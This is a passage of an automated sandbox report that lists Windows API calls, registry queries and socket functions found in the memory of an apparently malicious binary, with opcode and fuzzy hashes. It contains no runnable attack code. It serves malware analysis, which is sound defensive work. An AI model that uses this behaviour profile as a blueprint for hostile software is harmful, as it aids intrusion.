• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: FreeStringlstrcmpi
• String ID: device$deviceType
• API String ID: 1602765415-3511266565
                                                                                                                                    • Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                    • Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
                                                                                                                                    • Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                    • Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: service$serviceType
                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                    • Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                    • Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
                                                                                                                                    • Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                    • Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                    • String ID: %s%s
                                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                                    • Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                    • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                    • Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                    • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                    APIs
                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                    Strings
                                                                                                                                    • NoDrives, xrefs: 00406458
                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                    • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                    • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                      • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                      • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                    • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                    • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3488799664-0
                                                                                                                                    • Opcode ID: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                    • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                    • Opcode Fuzzy Hash: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                    • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                    • Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                    • Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
                                                                                                                                    • Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                    • Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
                                                                                                                                    APIs
                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                    • String ID: pdu
                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                    • Opcode ID: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                    • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                    • Opcode Fuzzy Hash: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                    • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                    APIs
                                                                                                                                    • GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
• QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
• StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: DeviceDriveQueryType
• String ID: ?c@$\??\
• API String ID: 1681518211-744975932
• Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
• Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
• Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
• Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
APIs
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
• InterlockedDecrement.KERNEL32(?), ref: 004018B1
  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
• String ID:
• API String ID: 3966618661-0
• Opcode ID: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
• Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
• Opcode Fuzzy Hash: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
• Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
APIs
• CreateFileW.KERNEL32(004163E0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
• WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
• FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
• CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
• InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
• String ID:
• API String ID: 442028454-0
• Opcode ID: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
• Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
• Opcode Fuzzy Hash: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
• Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99
APIs
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: _allshl
• String ID:
• API String ID: 435966717-0
• Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
• Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
• Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
• Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
APIs
• SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
  • Part of subcall function 0040AB60: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040ABBB
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CloseEventFreeHandleHeapObjectSingleWait
• String ID: pdu
• API String ID: 309973729-2320407122
• Opcode ID: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
• Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
• Opcode Fuzzy Hash: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
• Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
APIs
• ioctlsocket.WS2_32 ref: 0040112B
• recvfrom.WS2_32 ref: 0040119C
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
• WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
• String ID:
• API String ID: 3980219359-0
• Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
• Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
• Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
• Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
APIs
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
• WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
• WSAGetLastError.WS2_32 ref: 00401FB9
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
• String ID:
• API String ID: 2074799992-0
• Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
• Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
• Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
• Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
APIs
• WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
• WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
• Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
• WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: Recv$ErrorLastSleep
• String ID:
• API String ID: 3668019968-0
• Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
• Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
• Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
• Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                    APIs
• WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
• WSAGetLastError.WS2_32 ref: 00401B12
• Sleep.KERNEL32(00000001), ref: 00401B28
• WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: Send$ErrorLastSleep
• String ID:
• API String ID: 2121970615-0
• Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
• Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
• Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
• Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0040DEA9
• CloseHandle.KERNEL32(?), ref: 0040DED8
• LeaveCriticalSection.KERNEL32(?), ref: 0040DEE7
• DeleteCriticalSection.KERNEL32(?), ref: 0040DEF4
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CloseDeleteEnterHandleLeave
• String ID:
• API String ID: 3102160386-0
• Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
• Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
• Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
• Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
APIs
• EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
• LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
• LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
• Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
• Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
• Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
APIs
• CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
• SysAllocString.OLEAUT32(004161D0), ref: 004073A3
• CoUninitialize.OLE32 ref: 004073C8
  • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
• SysFreeString.OLEAUT32(00000000), ref: 004073C2
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: String$Free$AllocInitializeUninitialize
• String ID:
• API String ID: 459949847-0
• Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
• Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
• Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
• Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
APIs
